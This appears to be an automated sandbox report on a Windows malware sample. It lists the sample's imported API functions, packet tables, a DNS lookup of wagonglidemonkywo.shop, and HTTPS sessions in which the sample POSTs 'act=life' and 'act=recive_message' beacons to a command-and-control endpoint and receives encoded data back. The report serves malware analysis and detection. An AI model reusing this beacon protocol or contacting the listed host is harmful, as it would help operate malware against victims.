                                            KERNEL32.dllCreateFileA, GetNumaProcessorNode, DebugActiveProcessStop, GetConsoleAliasExesLengthA, SetUnhandledExceptionFilter, InterlockedIncrement, HeapFree, WaitForSingleObject, SetComputerNameW, ConnectNamedPipe, GetModuleHandleW, ReadConsoleOutputA, GlobalFindAtomA, LoadLibraryW, GetLocaleInfoW, GetFileAttributesA, HeapCreate, lstrcpynW, GetAtomNameW, GetModuleFileNameW, FindNextVolumeMountPointW, SetConsoleTitleA, GetLastError, GetLongPathNameW, GetThreadLocale, GetProcAddress, CreateHardLinkW, SetConsoleDisplayMode, FindAtomA, SetSystemTime, SetConsoleTitleW, HeapSetInformation, GetCurrentDirectoryA, DeleteCriticalSection, SetCalendarInfoA, FindAtomW, CreateFileW, ReadFile, FlushFileBuffers, HeapReAlloc, GetStringTypeW, HeapAlloc, ExitProcess, DecodePointer, GetCommandLineA, GetStartupInfoW, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, IsProcessorFeaturePresent, WriteFile, GetStdHandle, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, Sleep, RtlUnwind, MultiByteToWideChar, HeapSize, SetStdHandle, WriteConsoleW, LCMapStringW, CloseHandle
                                            USER32.dllCopyRect, GetMonitorInfoW, LoadIconA
                                            ole32.dllCoTaskMemFree
                                            WINHTTP.dllWinHttpAddRequestHeaders, WinHttpCloseHandle

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            SpanishPeru

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 29, 2024 08:10:51.908591986 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:51.908616066 CET44349730172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:51.908703089 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:51.911645889 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:51.911659956 CET44349730172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.116060019 CET44349730172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.116137981 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.118597031 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.118602037 CET44349730172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.118838072 CET44349730172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.161897898 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.165304899 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.165333986 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.165384054 CET44349730172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.615932941 CET44349730172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.616091967 CET44349730172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.616172075 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.617983103 CET49730443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.617994070 CET44349730172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.641308069 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.641350031 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.641418934 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.641761065 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.641772985 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.840208054 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.840389013 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.841604948 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.841609955 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.841830969 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:52.842931032 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.842946053 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:52.842992067 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358082056 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358155012 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358194113 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358207941 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.358230114 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358268976 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.358274937 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358305931 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358341932 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358342886 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.358352900 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358386040 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.358395100 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358562946 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358604908 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.358609915 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358778954 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358804941 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358817101 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.358822107 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.358856916 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.359184027 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.359282970 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.359327078 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.359610081 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.359623909 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.359637022 CET49731443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.359641075 CET44349731172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.482522011 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.482553005 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.482625961 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.482954025 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.482964993 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.687671900 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.687753916 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.689045906 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.689054012 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.689290047 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.690526962 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.690684080 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.690718889 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:53.690768957 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:53.690777063 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.186060905 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.186182976 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.186248064 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:54.186357021 CET49732443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:54.186371088 CET44349732172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.289649010 CET49733443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:54.289680004 CET44349733172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.289767027 CET49733443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:54.290132999 CET49733443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:54.290144920 CET44349733172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.490412951 CET44349733172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.490502119 CET49733443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:54.491708040 CET49733443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:54.491713047 CET44349733172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.491954088 CET44349733172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.493043900 CET49733443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:54.493164062 CET49733443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:54.493191957 CET44349733172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.985831976 CET44349733172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.986028910 CET44349733172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:54.986083984 CET49733443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.156390905 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.156418085 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:55.156486988 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.156829119 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.156840086 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:55.355298996 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:55.355432034 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.363248110 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.363253117 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:55.363503933 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:55.364717007 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.364835978 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.364869118 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:55.364999056 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.365008116 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:55.779160023 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:55.779278040 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:55.779337883 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.779479027 CET49734443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:55.779491901 CET44349734172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:56.548998117 CET49735443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:56.549024105 CET44349735172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:56.549103022 CET49735443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:56.549417019 CET49735443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:56.549428940 CET44349735172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:56.750353098 CET44349735172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:56.750442028 CET49735443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:56.751746893 CET49735443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:56.751753092 CET44349735172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:56.751986980 CET44349735172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:56.753150940 CET49735443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:56.753274918 CET49735443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:56.753304958 CET44349735172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.222826958 CET44349735172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.222935915 CET44349735172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.222995996 CET49735443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.223119020 CET49735443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.223131895 CET44349735172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.296659946 CET49736443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.296699047 CET44349736172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.296773911 CET49736443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.297111034 CET49736443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.297125101 CET44349736172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.497092009 CET44349736172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.497184992 CET49736443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.504642963 CET49736443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.504653931 CET44349736172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.504892111 CET44349736172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.510032892 CET49736443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.510119915 CET49736443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.510124922 CET44349736172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.993424892 CET44349736172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.993541002 CET44349736172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:57.993588924 CET49736443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.993659973 CET49736443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:57.993673086 CET44349736172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.607095003 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.607125998 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.607203960 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.607521057 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.607533932 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.808880091 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.808958054 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.811065912 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.811074972 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.811304092 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.812504053 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.813225985 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.813254118 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.813339949 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.813366890 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.813467979 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.813536882 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.813636065 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.813651085 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.813749075 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.813765049 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.813880920 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.813905001 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.813910961 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.814018011 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.814044952 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.860245943 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.860383987 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.860419989 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.860426903 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.908230066 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.908406019 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.908447981 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.908474922 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:58.956242085 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:58.956456900 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:10:59.000237942 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:10:59.096817970 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:11:00.614542961 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:11:00.614666939 CET44349737172.67.221.128192.168.2.4
                                            Mar 29, 2024 08:11:00.614712954 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:11:00.614809990 CET49737443192.168.2.4172.67.221.128
                                            Mar 29, 2024 08:11:00.614830971 CET44349737172.67.221.128192.168.2.4

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 29, 2024 08:10:51.795130014 CET5185153192.168.2.41.1.1.1
                                            Mar 29, 2024 08:10:51.903750896 CET53518511.1.1.1192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Mar 29, 2024 08:10:51.795130014 CET192.168.2.41.1.1.10x3514Standard query (0)wagonglidemonkywo.shopA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Mar 29, 2024 08:10:51.903750896 CET1.1.1.1192.168.2.40x3514No error (0)wagonglidemonkywo.shop172.67.221.128A (IP address)IN (0x0001)false
                                            Mar 29, 2024 08:10:51.903750896 CET1.1.1.1192.168.2.40x3514No error (0)wagonglidemonkywo.shop104.21.38.98A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • wagonglidemonkywo.shop

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449730172.67.221.1284437556C:\Users\user\Desktop\20qMFnd9tO.exe
                                            TimestampBytes transferredDirectionData
                                            2024-03-29 07:10:52 UTC269OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 8
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:52 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                            Data Ascii: act=life
                                            2024-03-29 07:10:52 UTC810INHTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=mn5evk7acbgbqgom517nqkk7vp; expires=Tue, 23-Jul-2024 00:57:31 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLPO2ui9uz2CVBX64rDgn72uqEiX2akX7cM9U0peRqdJE3YQljFsjrtJTWAJhBE3F%2FPsafkx%2B%2BTcfRFAJfngEE74Udz%2B3KKIgCVOjlAPKpJER%2F2sUOoKuvh%2B0B6q2Tq8X6fQJVthM5US"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0ae8cdd56fa1-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:52 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                            Data Ascii: 2ok
                                            2024-03-29 07:10:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449731172.67.221.1284437556C:\Users\user\Desktop\20qMFnd9tO.exe
                                            TimestampBytes transferredDirectionData
                                            2024-03-29 07:10:52 UTC270OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 52
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:52 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d 64 65 66 61 75 6c 74
                                            Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--key&j=default
                                            2024-03-29 07:10:53 UTC810INHTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=5qs5gocfj0culcivafg0eoq4js; expires=Tue, 23-Jul-2024 00:57:32 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vKQQaE%2Be2%2Bad3ek42gbbjbwrubhTZov7UvM2zB7XIBGWn5YLRimpg3hOW%2F%2FgH9HEKZkaoT22%2Bd7CzG6f8rVWR1X4%2Bj1lObzQj1HsDjDPzKFjAQbQn5wrcA64LkYzaJarxuBdWnhboc1"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0aed6814393e-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:53 UTC559INData Raw: 34 63 31 38 0d 0a 47 39 4b 6f 73 2f 65 4e 42 43 4a 35 52 49 4e 76 6e 52 54 6d 63 30 45 66 6f 79 32 7a 4f 52 65 6e 6d 7a 63 68 4e 30 67 54 43 73 56 67 33 36 4b 54 31 36 30 6b 41 41 39 6d 75 55 2b 70 4f 4f 74 35 59 54 2b 44 44 5a 46 4b 63 6f 57 68 46 31 56 46 50 58 59 6d 79 42 48 79 69 4a 50 58 72 32 56 47 57 33 36 6a 43 66 78 34 6c 52 5a 74 45 71 6b 4e 6b 78 6b 33 68 66 35 50 41 77 31 6f 53 41 66 50 4f 2f 4b 49 6b 39 65 74 66 79 39 7a 5a 4b 4e 50 76 54 54 47 55 32 45 39 78 6b 4f 52 41 7a 65 46 2f 6c 31 44 56 69 52 78 61 36 35 30 6f 73 54 51 6e 2b 46 6a 53 68 77 6e 35 77 37 78 65 59 4d 57 4a 48 37 4a 51 39 70 55 66 38 71 35 47 79 77 39 61 44 4d 71 35 54 76 79 69 4a 50 56 36 48 34 41 51 32 53 68 49 76 68 67 68 7a 34 67 62 4d 67 50 76 6a 4d 33 68 37 73 58 41
                                            Data Ascii: 4c18G9Kos/eNBCJ5RINvnRTmc0Efoy2zORenmzchN0gTCsVg36KT160kAA9muU+pOOt5YT+DDZFKcoWhF1VFPXYmyBHyiJPXr2VGW36jCfx4lRZtEqkNkxk3hf5PAw1oSAfPO/KIk9etfy9zZKNPvTTGU2E9xkORAzeF/l1DViRxa650osTQn+FjShwn5w7xeYMWJH7JQ9pUf8q5Gyw9aDMq5TvyiJPV6H4AQ2ShIvhghz4gbMgPvjM3h7sXA
                                            2024-03-29 07:10:53 UTC1369INData Raw: 36 68 36 75 4d 48 44 6c 66 31 67 54 52 34 30 35 77 6a 78 66 49 63 44 4b 58 50 48 54 4e 68 51 66 4d 44 2b 55 51 4d 62 52 52 6b 71 35 54 76 79 69 4a 50 58 72 53 5a 48 41 32 61 35 54 37 39 58 69 52 6f 76 64 39 5a 50 6b 54 51 64 68 37 73 58 41 52 64 6f 62 69 62 49 45 66 4b 49 6b 39 65 74 4a 46 6c 30 54 71 4e 50 76 54 54 47 55 32 45 2f 67 55 6a 64 47 79 32 48 75 56 46 43 55 53 74 31 5a 71 6c 39 76 4d 7a 66 6d 4f 42 67 53 68 73 68 36 77 58 33 64 34 6b 61 4c 48 33 45 51 74 56 64 65 63 54 38 46 51 30 36 51 6a 4d 71 35 54 76 79 69 4a 50 58 72 32 46 59 57 33 36 6a 54 64 46 78 68 77 4e 68 53 4d 4a 42 33 31 78 6a 68 5a 59 39 41 52 64 6f 4d 79 72 6c 5a 76 36 6c 75 64 65 74 4a 41 4a 5a 5a 50 68 69 6c 7a 54 47 55 32 45 2f 67 77 32 54 47 33 4c 4a 75 51 30 42 46 53 52 30
                                            Data Ascii: 6h6uMHDlf1gTR405wjxfIcDKXPHTNhQfMD+UQMbRRkq5TvyiJPXrSZHA2a5T79XiRovd9ZPkTQdh7sXARdobibIEfKIk9etJFl0TqNPvTTGU2E/gUjdGy2HuVFCUSt1Zql9vMzfmOBgShsh6wX3d4kaLH3EQtVdecT8FQ06QjMq5TvyiJPXr2FYW36jTdFxhwNhSMJB31xjhZY9ARdoMyrlZv6ludetJAJZZPhilzTGU2E/gw2TG3LJuQ0BFSR0
                                            2024-03-29 07:10:53 UTC1369INData Raw: 79 4b 6e 2f 71 48 4a 41 4a 5a 5a 4b 4e 50 76 54 54 45 46 6a 73 39 6d 51 32 52 63 58 62 52 2b 6c 38 42 59 43 6c 2f 5a 71 42 76 38 4b 57 35 31 36 30 6b 41 6c 6c 6b 2f 6b 4f 51 48 73 5a 54 59 54 2b 44 44 63 67 30 48 59 65 37 46 77 45 58 61 44 4d 71 35 33 36 38 69 6f 6e 58 72 32 74 42 45 79 44 7a 41 76 4a 31 69 68 38 73 65 4d 35 48 30 56 74 34 77 50 31 65 53 46 59 6e 64 58 71 74 65 62 6a 50 30 4a 2f 6c 4a 67 35 30 54 71 4e 50 76 54 54 47 55 32 45 2f 67 55 6a 4a 47 79 32 48 75 57 52 55 58 6d 68 45 61 36 6c 33 74 39 79 52 2b 6f 63 6b 41 6c 6c 6b 6f 30 2f 67 4f 4f 74 35 59 54 2b 44 44 5a 4d 5a 62 4b 71 52 46 77 45 58 61 44 4d 71 35 54 76 77 7a 64 33 56 74 79 51 41 46 69 37 6b 43 50 42 33 6a 68 38 6d 64 38 31 48 33 31 68 6e 79 76 31 56 54 31 30 67 66 47 61 6a 63
                                            Data Ascii: yKn/qHJAJZZKNPvTTEFjs9mQ2RcXbR+l8BYCl/ZqBv8KW5160kAllk/kOQHsZTYT+DDcg0HYe7FwEXaDMq5368ionXr2tBEyDzAvJ1ih8seM5H0Vt4wP1eSFYndXqtebjP0J/lJg50TqNPvTTGU2E/gUjJGy2HuWRUXmhEa6l3t9yR+ockAllko0/gOOt5YT+DDZMZbKqRFwEXaDMq5Tvwzd3VtyQAFi7kCPB3jh8md81H31hnyv1VT10gfGajc
